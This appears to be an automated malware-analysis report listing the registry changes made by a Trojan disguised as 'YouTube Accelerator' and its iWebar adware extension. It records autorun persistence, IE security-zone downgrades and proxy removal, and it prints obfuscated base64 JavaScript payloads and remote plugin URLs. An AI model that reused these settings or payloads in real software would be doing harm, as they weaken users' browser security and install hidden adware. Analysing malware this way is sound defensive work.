[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\YouTube Accelerator]
"YouTubeAccelerator.exe" = "YouTubeAccelerator"

[HKCU\Software\Goobzo\YouTube Accelerator]
"ShowAds" = "1"

[HKLM\SOFTWARE\Goobzo\YouTube Accelerator]
"Aff" = "limyu1_0_0_0_0,74261409-fb54-436c-b597-1b09ef03540d,"

[HKCU\Software\Goobzo\YouTube Accelerator]
"Aff" = "limyu1_0_0_0_0,74261409-fb54-436c-b597-1b09ef03540d,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YouTube Accelerator]
"Publisher" = "Goobzo Ltd."

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"schtasks.exe" = "Schedule Tasks"

[HKCU\Software\Goobzo\YouTube Accelerator]
"Beta" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YouTube Accelerator]
"InstallLocation" = "%Program Files%\YouTube Accelerator"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCU\Software\Goobzo\YouTube Accelerator]
"HideAccList" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Goobzo\YouTube Accelerator]
"ShowTrayIcon" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Goobzo\YouTube Accelerator\UserInfo]
"Newsletter" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YouTube Accelerator]
"DisplayVersion" = "3394(build_80)"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Goobzo\YouTube Accelerator]
"DontShowAccelerationNotSupported" = "1"
"Version" = "3.3.9.4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 28 A6 03 97 A8 8E E7 1F 8A E4 2B E8 B8 E3 77"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Goobzo\YouTube Accelerator\UserInfo]
"email" = ""

[HKCU\Software\Goobzo\YouTube Accelerator\UserInfo]
"Newsletter" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YouTube Accelerator]
"UninstallString" = "%Program Files%\YouTube Accelerator\VARemove.exe temp"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YouTube Accelerator]
"DisplayName" = "YouTube Accelerator"

[HKLM\SOFTWARE\Goobzo\YouTube Accelerator]
"Version" = "3.3.9.4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs\YouTube Accelerator]
"Order" = "E0 80 00 00 00 20 00 00 0D C0 10 00 00 10 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Goobzo\YouTube Accelerator]
"Beta" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Associations]
"Application" = "http://www.fileextensionpro.com/redir.aspx?s=limyu1_0_0_0_0,74261409-fb54-436c-b597-1b09ef03540d,&LangID=x&Ext=%s"

[HKCU\Software\Goobzo\YouTube Accelerator\UserInfo]
"email" = ""

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"GOOBZOYouTubeAccelerator" = "%Program Files%\YouTube Accelerator\YouTubeAccelerator.exe"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Goobzo\YouTube Accelerator]
[HKLM\SOFTWARE\Goobzo\YouTube Accelerator\Engine]

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Goobzo\YouTube Accelerator]
"Br"
"HideAccList"

[HKCU\Software\Goobzo\YouTube Accelerator\UserInfo]
"tver"

[HKCU\Software\Goobzo\YouTube Accelerator]
"Br"

[HKLM\SOFTWARE\Goobzo\YouTube Accelerator]
"ShowTrayIcon"
"BrName"

[HKCU\Software\Goobzo\YouTube Accelerator]
"BrName"

[HKLM\SOFTWARE\Goobzo\YouTube Accelerator\Engine]
"Mode"

The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"GoobzoYouTubeAccelerator"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"GoobzoYouTubeAccelerator"

"YouTubeAccelerator"

The process YouTubeAccelerator.exe:3416 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Goobzo\YouTube Accelerator\Tracer]
"TraceDestination" = "3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\RFC1156Agent\CurrentVersion\Parameters]
"TrapPollTimeMilliSecs" = "15000"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Goobzo\YouTube Accelerator\Tracer]
"TraceFolder" = "%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Log\"

"TimeStamp" = "0"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Goobzo\YouTube Accelerator]
"UiResVer" = "1000008"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Goobzo\YouTube Accelerator]
"RunFinishInstall" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Goobzo\YouTube Accelerator\Tracer]
"TimeLimit" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 27 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Goobzo\YouTube Accelerator]
"CommTestBootNeeded" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A2 25 DE 74 1D 3D E3 03 37 04 55 1A 41 BB AF 86"

[HKCU\Software\Goobzo\YouTube Accelerator\Tracer]
"TraceLevel" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Licenses]
"{03B3ED09D712B0615}" = "56 3E A8 0E 0B A2 A7 A6 41 06 53 98 3A A5 44 A3"
"{I3B3ED09D712B0615}" = "0C 00 00 00"

[HKCU\Software\Goobzo\YouTube Accelerator\Tracer]
"TracerDoBackup" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"GOOBZOYouTubeAccelerator" = "%Program Files%\YouTube Accelerator\YouTubeAccelerator.exe /startup"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Goobzo\YouTube Accelerator]
"ShowTrayMessage"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoConfigURL"

The process bb64c212-90f5-4d7e-87f7-ee5b0ade62fe-2.exe:3444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E5 E4 67 3A 22 DA 66 9C 50 EA 1D 59 86 87 82 1A"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5D5CE594-9CD0-4985-B392-B43AEAA2E9}]
"Policy" = "3"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5DF394CC-E07C-49F2-99F8-BBBDEDB6582}]
"AppName" = "bb64c212-90f5-4d7e-87f7-ee5b0ade62fe-2.exe-buttonutil.exe"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5D5CE594-9CD0-4985-B392-B43AEAA2E9}]
"AppPath" = "%Program Files%\Object Browser"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2D93F08C-1F67-4591-90C3-B0CDBFD622D9}]
"AppName" = "bb64c212-90f5-4d7e-87f7-ee5b0ade62fe-2.exe-codedownloader.exe"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{452E4C48-3CF0-4AD0-974C-85C82A46B79F}]
"AppPath" = "%Program Files%\Object Browser"
"Policy" = "3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{11111111-1111-1111-1111-110311281150}" = "1"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2D93F08C-1F67-4591-90C3-B0CDBFD622D9}]
"AppPath" = "%Program Files%\Object Browser"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5D5CE594-9CD0-4985-B392-B43AEAA2E9}]
"AppName" = "bb64c212-90f5-4d7e-87f7-ee5b0ade62fe-2.exe-buttonutil64.exe"

[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
"{11111111-1111-1111-1111-110311281150}" = ""

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5DF394CC-E07C-49F2-99F8-BBBDEDB6582}]
"Policy" = "3"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2D93F08C-1F67-4591-90C3-B0CDBFD622D9}]
"Policy" = "3"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{452E4C48-3CF0-4AD0-974C-85C82A46B79F}]
"AppName" = "bb64c212-90f5-4d7e-87f7-ee5b0ade62fe-2.exe-helper.exe"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5DF394CC-E07C-49F2-99F8-BBBDEDB6582}]
"AppPath" = "%Program Files%\Object Browser"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
"Timestamp"

The process sc.exe:3340 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5D B7 E2 89 17 8C 7C 4C 99 15 59 D5 03 6B FF 51"

The process iWebar-codedownloader.exe:2088 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\iWebar\Plugins\72]
"URL" = "http://js.clientstatsservice.com/plugins/mins/appApiValidation.js"

[HKCU\Software\iWebar\Plugins\244]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTI2MTcxNGIxYjAyMTUwMjMzMGIwNTQ5NDI0OTUxMWUxNTA2MTY0MzQ2NDQxZDExMDc0NzRmMTcwODFlMDgwYzFkMTAxMjU4MDIxZDBiNTYxZTAyMWMwZTE2MDI0ZTFiMDgxMzBjMDgwYzM2MDAwNjAwMDAwZDU2MDAwNTEyMzYwMDA2MTMxOTM5MGExZDBhMGExZDE2MDQ0ZjE4MTU0NjE5MDIxYzU0M2YyMjI0MDEyOTNkMjg1YTM3MmQyMjA1MmMxODAxNGEyNDAxMzExYTNkMzIwMjQ2MjkyZDI4NGU0YjJkNTUwNTE0MTAwZjFkNTQzNDI3MmEyMTM5MzIyMTM0MzAyZDJlMmEzNjIwMjMyMzJkMmYzZDM2MzQ1YTQ1Nzk3ZjQzMDIwYTBjMGUwMjE2MjAxNzU0NWI1MjU0NGQ1ZDYxMDU=', 'ikxisvarfy'); }"

[HKCU\Software\iWebar\Manifest]
"BgVersion" = "1"

[HKCU\Software\iWebar\Plugins\1]
"Version" = "10"

[HKCU\Software\iWebar\Plugins\78]
"Name" = "CrossriderInfo"

[HKCU\Software\iWebar\Manifest]
"ThanksUrl" = "NA"

[HKCU\Software\iWebar\Plugins\155]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWY3ZDdhNGQwNjFkMWUwNTJmMTAwODU1NDk0ZjRjMDExZTAxMGE1ODRiNTgxMDAzMDUwNDA1MWI1NDAxMGIxYTVjMGUwYTNhMGYwNzBjMDc0YjEwMTYxYjNhMDgwZDRhMTkwYjAwNGEyYzMwMmQzYjI1MjYyOTMwMmQzMzM2M2QzMTNhM2YzNzI1MmIyMDI4MmM0OTFlMDAwZTQ4MzkzMDM3MjUzNzNkNDgxZDEzMDUxZjVmMGQxOTE5MGEwZDFkNDg1OTcwNmI0NjA3MWYxYTA5MDAwNDNjMWU0MDVlNTc0MjVhNWI0NTYwNTU1YTQyNDQ1NTA1MGExYzFkMDMxNjFiMGU0NjRkNTMzNDRjMTkwNTA1MDk0MDM5N2QwZQ==', 'dwsonijuzb'); }"

[HKCU\Software\iWebar\Plugins\4]
"URL" = "http://js.clientstatsservice.com/plugins/javascripts/jquery-1_7_1_min.js"

[HKCU\Software\iWebar\Plugins\244]
"Version" = "2"

[HKCU\Software\iWebar\Plugins\7]
"Name" = "hooks"

[HKCU\Software\iWebar\Plugins\220]
"Name" = "icm_base_m"

[HKCU\Software\iWebar\Installer]
"Params" = "{ source_id : 000169, sub_id : 0, uzid : eyJkYXRhIjp7ImRhdGUiOiJFNjR3bGlteXUxLDc0MjYxNDA5LWZiNTQtNDM2Yy1iNTk3LTFiMDllZjAzNTQwZCwiLCJ1bnEiOiI3NDI2MTQwOS1mYjU0LTQzNmMtYjU5Ny0xYjA5ZWYwMzU0MGQifX0="

[HKCU\Software\iWebar\Code]
"AppJavaScript" = " /************************************************************************************ This is your Page Code. The appAPI.ready() code block will be executed on every page load. For more information please visit our docs site: http://docs.crossrider.com**********************************************... = http://wt.iwebar.com;TOOLBAR_URL = HOST '/js/toolbar.js';AFFILIATE_ID = 'NONE';appAPI.ready(function($) { /* if (appAPI.db.get('user_id') === null) { if (appAPI.db.get('installation') === null){ appAPI.db.set('installation', new Date().getTime()); return; } else { if ((new Date().getTime() - appAPI.db.get('installation')) < 1000 * 60 * 60 * 48){ //No need to display toolbar... hasn't been 2 days yet. return; } } }*/ console.log(=======> Extension [version: appAPI.appInfo.version ] loading...); // Set the affiliate ID //appAPI.db.set('affiliate_id', AFFILIATE_ID); // Include the Base64 library appAPI."

[HKCU\Software\iWebar\Plugins\217]
"URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/similar_products_m.js"

[HKCU\Software\iWebar\Plugins\204]
"URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/pricedetect_m.js"

[HKCU\Software\iWebar\Plugins\45]
"Name" = "IEOnRequest"

[HKCU\Software\iWebar\Plugins\44]
"Version" = "6"

[HKCU\Software\iWebar\Plugins\94]
"JavaScript" = "appAPI.isBackground=false;appAPI.tabId=POPUP;appAPI.internal.scope=Consts.SCOPE.POPUP;appAPI.browserAction.setBadgeBackgroundColor=function(a){if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Expected an array but got: (typeof a));return;}if(a.length!==4){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Color array should have 4 members (RGBA));return;}appAPI.internal.message.send({eventName:onSetBadgeColorFromPopup,eventContent:a});};appAPI.browserAction.setBadgeText=function(c,a){var b={};if(typeof c!==string){console.error(appAPI.browserAction.setIcon - Invalid parameter. Expected string (1st param) but got: (typeof c));return;}b.text=c;if(typeof a===undefined||a===null){b.color=null;}else{if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeText - Invalid parameter. Expected an array (2nd param) but got: (typeof a));return;}else{if(a.length!==4){console.error(appAPI.browserAction.se"

[HKCU\Software\iWebar\Plugins\28]
"Name" = "initializer"

[HKCU\Software\iWebar\Manifest]
"EnableSearchIE" = "false"

[HKCU\Software\iWebar\Plugins\220]
"URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/icm_base_m.js"

[HKCU\Software\iWebar\Plugins\47]
"JavaScript" = "(function(){appAPI.ready=function(a){appAPI.resources.isReady(a);};}());var CrossRiderResourcesManager=(function(){var C={appId:(function(){var D=appAPI.appInfo;if(D){return appAPI.appInfo.id;}else{return appAPI.appID;}})(),url:{base:{production:http://resources.crossrider.com,staging:http://staging-app.crossrider.com},update:/apps/{appId}/resources/meta/{lastVersion}},env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:(appAPI.internal.debug.isDebugMode()&&appAPI.internal.db.get(debug_resources_path))},w=o(meta)||{},g=o(remote_resources)||{remoteId:0},t=o(queue)||{},B=o(lastVersion)||0,A,s;appAPI.resources={init:function(){if(C.isDebug){h();}else{l(function(D){if(D){k();}else{h();}});}},isReady:function(D){s=D;if(A){h();}},get:function(D){if(typeof jQuery!==undefined){D=jQuery.trim(D);}return b(D,string);},includeCSS:function(G,F){if(typeof jQuery!==undefined){G=jQuery.trim(G);}var E=bYG"

[HKCU\Software\iWebar\Manifest]
"Description" = "iWebar"
"UpdateInterval" = "360"

[HKCU\Software\iWebar\Update]
"LastCheck" = "1401908115"

[HKCU\Software\iWebar\Plugins\44]
"URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEMisc.js"

[HKCU\Software\iWebar\Plugins\46]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal===undefined){appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}}}appAPI.internal.callbacks.timersListeners={};appAPI.internal.callbacks.timersIsInterval={};appAPI.internal.callbacks.timer=function(b){var a=b.timerId;if(typeof a!==number){return;}if(typeof appAPI.internal.callbacks.timersListeners[a]===undefined){return;}var d=appAPI.internal.callbacks.timersListeners[a];if(!appAPI.internal.callbacks.timersIsInterval[a]){clearInterval(a);delete appAPI.internal.callbacks.timersListeners[a];delete appAPI.internal.callbacks.timersIsInterval[a];}try{d();}catch(c){console.error(setInterval/setTimeout - Caught an exception from user callback: (typeof c.message===string?c.message:???));}};(function(a){appAPI.setInterval=function(d,c,e){if((typeof d!==undefined)&&(typeof c===number)){var b=a.setIn"

[HKCU\Software\iWebar\Plugins]
"NewTabPluginList" = "42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,72,28"

[HKCU\Software\iWebar\Plugins\195]
"Name" = "icm_convertmedia_m"

[HKCU\Software\iWebar\Plugins\44]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(a){appAPI.dns={};appAPI.dns.resolveIP=function(b){return a.resolveIp(b);};appAPI.fetchUrl=function(b){return a.fetchUrl(b);};appAPI.openURL=function(e,d){var c;if(typeof e===object){c=e;if(typeof a.openUrlEx!==undefined){a.openUrlEx(appAPI.JSON.stringify(c));return;}else{d=c.where;e=c.url;}}if(typeof e!==string){console.error(appAPI.openURL - Invalid parameter. Expected string (1st param) but got: (typeof e));return;}if(d!==current&&d!==tab&&d!==window&&d!==popup){console.error(appAPI.openURL - Invalid parameter. Expected current/tab/window (2nd param) but got: d);return;}if(typeof a.openUrlEx!==undefined){var f=(document&&document.documentElement&&document.documentElement.clientHeight)?document.documentElement.clientHeight 100:100;var h=(document&&document.documentElement&&document.documentElement.clientWidth)?document.documentElement.clientWidth 80:100;var g=(window&&window.screenTop)?((window.screenTop-20)<0?0:(window.screenTop-20)"

[HKCU\Software\iWebar\Plugins\38]
"Version" = "4"

[HKCU\Software\iWebar\Installer]
"StatsDomain" = "http://stats.clientstatsservice.com"

[HKCU\Software\iWebar\Plugins\13]
"URL" = "http://js.clientstatsservice.com/plugins/mins/CrossriderAppUtils.js"

[HKCU\Software\iWebar\Plugins\78]
"URL" = "http://js.clientstatsservice.com/plugins/mins/CrossriderInfo.js"

[HKCU\Software\iWebar\Plugins\102]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGY2OTRlNTY0YjU3NTIwNzFhMTgwNDM2MWMxYTQ5NGQ1MDRkMDYxODAwMTM1NDU5NDQxZTVlMGMxYzA4MDYwOTFkNTgwMjE5MTYwMDQxMGYwNjA3MWM1OTAxMTYwNjBlMWQwZjA2MGExZTAyNDUxZDAzNTAwZDA0MTUwZDAwMTMwNzRhMTMxZDBhMWUyYjNjMzEzNTM5MzgyMzNjM2MyNTMwMjYzYzI5MzgyMjMyMzAyNzI4MmIzYzQ4MTcxYjA3MjQwNjFhMDAxMTVlMzEyOTI4MjUzZjNjM2QzZTNkMjcyYjI0MzQzNjIwM2YzMTIyMzUyZTJiMjkzNDUxMTgwNjBhNTEyYjNjMmQyNDI0MjQyMzNkMjcyODMxMzEzMTIzMzgzMjIyMzAyNzI4MmIzYzRjNWE2MTU3NTA0ZjRlNGUxYzE3MWEwNjE4MjIwMjAzNGM1NjU0NDEwNjAyMWYwNzAzNTU0MTQzMWQzYzBkMDQwZjA1MWExYzMxMDUxYTA1MDE1ODFmMWIwMzBjMGEwMjVhMDAwMTFiNDQxNDAyMGIxYzQzMWUwMjE4MTcxODE0MDIwNjFlMTg1YTA5MWQ0OTA4MWYxMTAxMDAwOTE4NWUwZDA0MGYwNTJmMzAzMTJmMjYyYzNkMjUzOTNlMzQyYTNjMzMyNzM2MmMyOTIyMzMyZjMwNDgwZDA0MTMzYTFmMWYxYjE1NTIzMTMzMzczMTIxMjUzODI1MzkyYjJiM2UyYjIyM2UyNjM0MzkzMTIyMmIzMzJiNDUwNjFmMGY0YTJmMzAyZDNlM2IzMDNkMjQyMjMzMzUzZDMxMzkyNzI2M2MyOTIyMzMyZjMwNGM0MDdlNDM0ZTU2NGI1NTAwMDMxYjBiMWQwZDI3MTI0OTRkNTA1ZTVlNWU1ODY5NGU1NjRiNTc1MjE5MGIxZTAwMGEwZDE3MDc1NTRhNGYzNTRlMDcwYjAxMDYxYjFlMWUG"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\iWebar\Plugins\94]
"URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEPopup.js"

[HKCU\Software\iWebar\Installer]
"FullVersionForUrl" = "1_34_05_12"

[HKLM\SOFTWARE\iWebar\IE]
"TotalProfiles" = "1"

[HKCU\Software\iWebar\Plugins\40]
"Name" = "IEExtension"

[HKCU\Software\iWebar\Plugins\246]
"Version" = "10"

[HKCU\Software\iWebar\Plugins\38]
"Name" = "IECallbacks"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\iWebar\Plugins\93]
"Name" = "superfish_no_coupons_m"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\iWebar\Plugins\91]
"Version" = "47"

[HKCU\Software\iWebar\Plugins\13]
"Version" = "7"

[HKCU\Software\iWebar\Manifest]
"Manifest" = "NA"

[HKCU\Software\iWebar\Plugins\3]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

[HKCU\Software\iWebar\Plugins\36]
"Name" = "IEBackground"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\iWebar\Plugins\46]
"Name" = "IETimers"

[HKCU\Software\iWebar\Plugins\7]
"URL" = "http://js.clientstatsservice.com/plugins/mins/hooks.js"

[HKCU\Software\iWebar\Plugins\207]
"URL" = "http://js.clientstatsservice.com/plugins/mins/dbWrapper.js"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\iWebar\Plugins\22]
"Version" = "5"

[HKCU\Software\iWebar\Manifest]
"DisableIe" = "true"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\iWebar\Plugins\39]
"URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEDatabase.js"

[HKCU\Software\iWebar\Plugins\42]
"Version" = "9"

[HKCU\Software\iWebar\Plugins\40]
"Version" = "4"

[HKCU\Software\iWebar\Plugins\22]
